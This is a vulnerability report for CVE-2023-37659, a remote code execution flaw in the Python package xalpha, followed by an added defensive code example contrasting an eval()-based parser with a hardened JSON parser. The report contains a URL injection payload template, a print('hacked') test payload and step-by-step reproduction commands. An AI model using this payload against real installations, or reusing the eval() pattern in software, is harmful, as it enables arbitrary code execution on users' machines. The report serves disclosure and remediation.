CVE-2023-37659: [Warning] RCE in xalpha v0.11.4 ~ v0.11.8 · Issue #175 · refraction-ray/xalpha
xalpha v0.11.4 is vulnerable to Remote Command Execution (RCE).
Vulnerability Product: xalpha v0.11.4 ~ v0.11.8
Vulnerability version: v0.11.4 ~ v0.11.8
Vulnerability type: Remote Command Execute
Vulnerability Details:
Vulnerability location: xalpha/info.py -> fundinfo._basic_init
User-controlled input is passed to the dangerous function eval() without any validation, which causes RCE in xalpha v0.11.4 ~ v0.11.8 at xalpha/info.py -> fundinfo._basic_init.
payload = …/gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = {your rce python command}; &_=1688890155531#
test_payload = …/gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print('hacked'); &_=1688890155531#
Let's take v0.11.4, the latest version released on GitHub, as an example.
First, install the vulnerable version:
pip3 install xalpha==0.11.4
Second, import the package:
import xalpha
Third, call xalpha.fundinfo() with the test_payload as its argument:
xalpha.fundinfo("…/gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print('hacked'); &_=1688890155531#")
Following that, you can see that it successfully runs the Python code, which proves the RCE.
You can also prove the RCE in version 0.11.8, but v0.11.4 is a stable version.
Reason:
The path of self.url can be relocated to / by …
If you pass the test_payload …/gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print('hacked'); &_=1688890155531#, the path is relocated to /gaoduan/PinzhongRightApi.aspx together with the callback parameter. The re.match only checks the body of the response and never checks the position of the data, so it causes RCE.
discovered by leeya_bug
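The root cause above is a parser that locates a field anywhere in a fetched response body and hands its value to eval(). The following is an added example, not code from this report or from the xalpha project, showing that loose pattern next to a hardened parser for the same field. It assumes a response shape of "var Data_netWorthTrend = <json array>;" (the report does not show the real body), uses a placeholder allowed host because the report elides the real data-source host, and uses constructed sample bodies; the regexes are illustrative, not xalpha's own.

```python
import json
import re
from urllib.parse import urlsplit

# Constructed sample bodies. The exact shape of the real upstream response is
# not shown in the report; the "var Data_netWorthTrend = <json>;" form is an
# assumption used only for illustration.
GOOD_BODY = 'var Data_netWorthTrend = [{"x": 1688832000000, "y": 1.2345}];var other = 1;'
# A reflected-callback style body whose field value is not a JSON literal
# (constructed; the statement is benign and is never executed below).
BAD_BODY = 'jQuery_cb Data_netWorthTrend = print("x"); var other = 1;'

# Hosts the data source is expected to live on. Placeholder: the report elides
# the real host, so substitute the project's actual data source here.
ALLOWED_HOSTS = {"data-source.example"}

# Loose pattern in the style the report describes: it finds the field anywhere
# in the body, so anything echoed ahead of it (e.g. a callback name) is accepted.
LOOSE_FIELD_RE = re.compile(r"Data_netWorthTrend\s*=\s*(.*?);", re.S)

# Hardened pattern: anchored to the start of the body, so the data must sit at
# the expected position, and the captured value is parsed as JSON, never eval'd.
STRICT_FIELD_RE = re.compile(r"^\s*var\s+Data_netWorthTrend\s*=\s*(\[.*?\])\s*;", re.S)


def parse_net_worth_unsafe(body):
    """The defect described in the report: regex match, then eval() on the value.
    Kept only to contrast with parse_net_worth_safe(); do not use."""
    m = LOOSE_FIELD_RE.search(body)
    if not m:
        raise ValueError("Data_netWorthTrend not found")
    return eval(m.group(1))  # executes whatever the response body contains


def validate_source_url(url):
    """Reject fetch targets that are not the expected data source."""
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS:
        raise ValueError("refusing to fetch from an unexpected host: %r" % url)
    return url


def parse_net_worth_safe(body):
    """Position-checked, JSON-only parse of the net-worth series."""
    m = STRICT_FIELD_RE.match(body)
    if not m:
        raise ValueError("response does not start with the expected field")
    try:
        value = json.loads(m.group(1))
    except json.JSONDecodeError as exc:
        raise ValueError("field value is not a JSON literal") from exc
    # Schema check: a list of {x, y} points with numeric values.
    if not isinstance(value, list):
        raise ValueError("unexpected value type")
    for point in value:
        if not (isinstance(point, dict)
                and isinstance(point.get("x"), (int, float))
                and isinstance(point.get("y"), (int, float))):
            raise ValueError("unexpected point shape")
    return value


if __name__ == "__main__":
    validate_source_url("https://data-source.example/path?fc=AF5097")
    print(parse_net_worth_safe(GOOD_BODY))
    try:
        parse_net_worth_safe(BAD_BODY)
    except ValueError as exc:
        print("rejected:", exc)
```

Three independent checks close the hole the report describes: the fetch target is restricted to the expected host rather than any caller-supplied URL, the field must appear at the expected position instead of anywhere in the body, and the value is decoded with json.loads and shape-checked, so a reflected callback parameter can never reach an interpreter.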